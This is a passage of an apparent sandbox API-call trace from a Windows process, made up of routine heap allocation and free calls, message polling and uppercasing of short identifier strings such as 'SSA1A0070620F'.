returned 0x2aab020 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0212.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0212.771] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0212.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1b8 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0212.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0212.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0212.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0212.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.774] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0212.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.775] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0212.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.778] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1a0 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.778] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.778] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0212.779] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0212.779] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0212.779] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3f8 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38549c8 [0212.779] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0212.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.779] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | 